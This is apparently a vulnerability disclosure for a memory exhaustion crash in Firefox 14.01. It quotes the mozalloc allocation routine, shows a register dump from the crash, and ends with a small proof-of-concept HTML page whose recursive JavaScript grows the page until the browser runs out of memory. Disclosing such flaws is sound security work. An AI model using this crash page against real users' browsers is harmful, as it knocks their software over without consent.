Mozilla Firefox is prone to a memory exhaustion vulnerability.
The issue has been tested on Firefox 14.01, prior versions may also be affected.
mozalloc.cpp, line 184:
moz_xposix_memalign(void **ptr, size_t alignment, size_t size)
{
int err = posix_memalign(ptr, alignment, size);
if (UNLIKELY(err && ENOMEM == err)) {
mozalloc_handle_oom();
return moz_xposix_memalign(ptr, alignment, size);
}
// else: (0 == err) or (EINVAL == err)
return err;
}
A crafted JavaScript leads the application to crash.
Stacktrace (Windows 7 SP1):
EAX 00000000
ECX 5D923896 MSVCR100.5D923896
EDX 00000003
EBX 7FB00000 UNICODE "xxxxxxxxx [...]"
ESP 002BB7F8
EBP 002BB85C
ESI 5D8D1EC6 MSVCR100.__p__iob
EDI 5D92379C MSVCR100.fputs
EIP 73FC1999 mozalloc.73FC1999
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(C000)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty 0.1085754583206562651
ST2 empty -0.0696429635909516231
ST3 empty 86.763962149620056150
ST4 empty 31200.200000000000730
ST5 empty 1.3451474216221712500e+15
ST6 empty 1.0390856000000000000e+10
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0022 Cond 0 0 0 0 Err 0 0 1 0 0 0 1 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
-->
<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
document.body.innerHTML += x;
e(x + 'x');
};
e('x')
</script>
</html>
评论关闭。